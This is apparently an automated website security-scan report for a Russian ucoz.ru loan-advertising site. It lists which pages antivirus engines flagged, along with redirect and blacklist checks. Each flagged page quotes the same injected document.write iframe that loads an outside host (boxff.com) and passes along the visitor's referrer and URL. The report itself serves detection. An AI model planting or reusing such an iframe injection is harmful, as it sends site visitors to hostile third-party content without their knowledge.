Scanned pages/files
Request | Server response | Status |
http://creditokqhtlcl.ucoz.ru/news/sberbank_rasprodazhi_avtomobilej/2013-08-14-167 | 200 OK Content-Length: 62502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">'); Antivirus reports:
| ||
http://s85.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s85.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s85.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://s85.ucoz.net/cgi/uutils.fcg?a=soc_comment_get_data&site=0creditokqhtlcl | 200 OK Content-Length: 531 Content-Type: application/javascript | clean |
http://s85.ucoz.net/src/socCom.js | 200 OK Content-Length: 6344 Content-Type: text/javascript | clean |
http://creditokqhtlcl.ucoz.ru/ | 200 OK Content-Length: 59886 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">'); Antivirus reports:
| ||
http://creditokqhtlcl.ucoz.ru/register | 200 OK Content-Length: 26495 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">'); Antivirus reports:
| ||
http://creditokqhtlcl.ucoz.ru/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://creditokqhtlcl.ucoz.ru/news/rss/ | 200 OK Content-Length: 300746 Content-Type: text/xml | clean |
http://creditokqhtlcl.ucoz.ru/news/kredit_nalichnymi_do_50000/2014-11-06-740 | 200 OK Content-Length: 76056 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">'); Antivirus reports:
| ||
http://creditokqhtlcl.ucoz.ru/news/2014-00 | 200 OK Content-Length: 30652 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">'); Antivirus reports:
| ||
http://creditokqhtlcl.ucoz.ru/news/2014-01-11 | 200 OK Content-Length: 102195 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">'); Antivirus reports:
| ||
http://creditokqhtlcl.ucoz.ru/news/2014-01 | 200 OK Content-Length: 34060 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">'); Antivirus reports:
| ||
http://creditokqhtlcl.ucoz.ru/news/2014-1-31 | 200 OK Content-Length: 81637 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'¶meter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=����� ������">'); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: creditokqhtlcl.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 01 Aug 2015 09:39:53 GMT
Server: uServ/3.2.2
Content-Length: 59886
Content-Type: text/html; charset=UTF-8
...59886 bytes of data.
GET / HTTP/1.1
Host: creditokqhtlcl.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 01 Aug 2015 09:39:53 GMT
Server: uServ/3.2.2
Content-Length: 59886
Content-Type: text/html; charset=UTF-8
...59886 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: creditokqhtlcl.ucoz.ru
Referer: http://www.google.com/search?q=creditokqhtlcl.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: creditokqhtlcl.ucoz.ru
Referer: http://www.google.com/search?q=creditokqhtlcl.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=creditokqhtlcl.ucoz.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://creditokqhtlcl.ucoz.ru/
Result: creditokqhtlcl.ucoz.ru is not infected or malware details are not published yet.
Result: creditokqhtlcl.ucoz.ru is not infected or malware details are not published yet.